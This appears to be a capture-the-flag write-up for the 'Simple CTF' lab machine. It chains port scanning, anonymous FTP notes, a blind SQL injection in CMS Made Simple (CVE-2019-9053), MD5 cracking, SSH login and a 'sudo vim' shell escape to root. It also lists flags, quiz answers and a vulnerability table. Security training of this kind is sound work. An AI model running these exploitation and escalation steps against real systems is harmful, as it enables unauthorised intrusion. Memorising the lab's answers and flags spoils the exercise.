Overview
Simple CTF chains together anonymous FTP intel, a time-based blind SQL injection
in CMS Made Simple (CVE-2019-9053), and a classic vim sudo NOPASSWD
privilege escalation. The FTP note reveals the target username and confirms a weak
reused password — the SQLi extracts the salted MD5 hash, and cracking it takes seconds.
[Recon] nmap full scan → ports 21, 80, 2222 Anonymous FTP → note reveals weak/reused password for "mitch" Gobuster → /simple/ (CMS Made Simple 2.2.8) [Exploitation] CVE-2019-9053 (SQLi) → mitch:hash:salt Crack MD5(salt+pass) → password: secret [Initial Access] SSH port 2222 as mitch:secret cat ~/user.txt → G00d j0b, keep up! [PrivEsc] sudo -l → vim NOPASSWD sudo vim -c ':!/bin/bash' → root shell cat /root/root.txt → W3ll d0n3. You made it!
Port Scan & Service Discovery
$ sudo nmap -p- --min-rate=5000 -T4 -sS 10.48.185.49 $ sudo nmap -sV -sC -p21,80,2222 10.48.185.49
| Port | Service | Version | Notes |
|---|---|---|---|
21/tcp | FTP | vsftpd 3.0.3 | Anonymous login allowed |
80/tcp | HTTP | Apache 2.4.18 | robots.txt → rabbit hole |
2222/tcp | SSH | OpenSSH 7.2p2 | Non-standard port |
Default nmap (top 1000 ports) finds 2 services — FTP on 21 and HTTP on 80. SSH on port 2222 only appears with a full port scan.
FTP — Anonymous Access & Intel
Anonymous FTP login is allowed. Inside /pub/, a note addressed to “mitch”:
Dammit man... you're the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Key intel: user mitch reuses a weak password across the CMS and SSH.
Find the CMS password and it’ll be the SSH password too.
Web — CMS Made Simple 2.2.8
$ gobuster dir -u http://10.48.185.49 -w /usr/share/dirb/wordlists/common.txt -t 50 -q /simple (Status: 301)
/simple/ hosts CMS Made Simple version 2.2.8 — vulnerable to
CVE-2019-9053, an unauthenticated time-based blind SQL injection in the
News module.
CVE-2019-9053 — Time-Based Blind SQLi
The m1_idlist parameter in /moduleinterface.php is passed
unsanitized into a MySQL query. An attacker injects SLEEP()
payloads to exfiltrate data character-by-character based on timing differences.
Username: mitch Email: admin@admin.com Salt: 1dac0d92e9fa6bb2 Hash: 0c01f4468bd75d7a84c7eb73846e8d96
Hash format is MD5(salt + password). Cracking is trivial:
$ python3 -c " import hashlib salt = '1dac0d92e9fa6bb2' password = 'secret' print(hashlib.md5((salt + password).encode()).hexdigest()) " 0c01f4468bd75d7a84c7eb73846e8d96 ✓ match
Password cracked: secret — exactly what the FTP note warned about.
SSH — User Shell & Flag
$ ssh -p 2222 mitch@10.48.185.49 Password: secret uid=1001(mitch) gid=1001(mitch) groups=1001(mitch) $ cat ~/user.txt G00d j0b, keep up! $ ls /home mitch sunbath
Other user in /home: sunbath
vim sudo NOPASSWD → Root
$ sudo -l User mitch may run the following commands: (root) NOPASSWD: /usr/bin/vim
vim is a well-known
GTFOBins sudo escalation vector.
Spawning a root shell:
$ sudo vim -c ':!/bin/bash' root@Machine:~# # cat /root/root.txt W3ll d0n3. You made it!
Questions & Answers
| # | Question | Answer |
|---|---|---|
| 1 | How many services on port ≤1000? | 2 (FTP/21, HTTP/80) |
| 2 | What’s running on the higher port? | SSH on port 2222 |
| 3 | CVE being used? | CVE-2019-9053 |
| 4 | What kind of vulnerability? | SQLi (Time-Based Blind) |
| 5 | What’s the password? | secret |
| 6 | Where to login? | SSH port 2222 |
| 7 | User flag? | G00d j0b, keep up! |
| 8 | Username in /home? | sunbath |
| 9 | Leverage for privileged shell? | vim (sudo NOPASSWD) |
| 10 | Root flag? | W3ll d0n3. You made it! |
Attack Chain
mitch with weak reused password/simple/ — CMS Made Simple 2.2.8mitch’s salted MD5 hash → cracked to secretmitch:secret → User flag: G00d j0b, keep up!sudo vim -c ':!/bin/bash' → Root flag: W3ll d0n3. You made it!Vulnerabilities
| Finding | Location | Severity | Impact |
|---|---|---|---|
| Unauthenticated Blind SQLi (CVE-2019-9053) | /simple/moduleinterface.php |
Critical | Full credential extraction without auth |
| vim sudo NOPASSWD | sudoers config | Critical | Instant root shell via GTFOBins |
| Credential reuse (CMS → SSH) | System-wide | High | CMS compromise cascades to SSH access |
Weak password (secret) |
CMS / SSH | High | Crackable in seconds from hash |
| Anonymous FTP with sensitive files | FTP (21) | Medium | Username and password weakness disclosed |
Takeaways
vim with sudo NOPASSWD is a trivial root vector via
:!/bin/bash. Only grant sudo for binaries that can’t spawn shells.
Full-Chain Exploit Script
The complete chain is automated in pwn_simplectf.sh — recon, FTP
enumeration, time-based SQLi extraction, hash cracking, SSH access, and vim
privilege escalation.
$ chmod +x pwn_simplectf.sh $ ./pwn_simplectf.sh 10.48.185.49 [+] Username: mitch [+] Hash: 0c01f4468bd75d7a84c7eb73846e8d96 [+] Salt: 1dac0d92e9fa6bb2 [+] Password cracked: secret [FLAG] USER FLAG: G00d j0b, keep up! [FLAG] ROOT FLAG: W3ll d0n3. You made it!
Tools Used
| Tool | Purpose |
|---|---|
nmap | Port scanning and service enumeration |
gobuster | Web directory brute-force |
ftp | Anonymous FTP enumeration |
python3 | Custom time-based blind SQLi extraction script |
sshpass | Automated SSH login |
vim | Privilege escalation (GTFOBins sudo vector) |
pwn_simplectf.sh | Full-chain automated exploit (Bash) |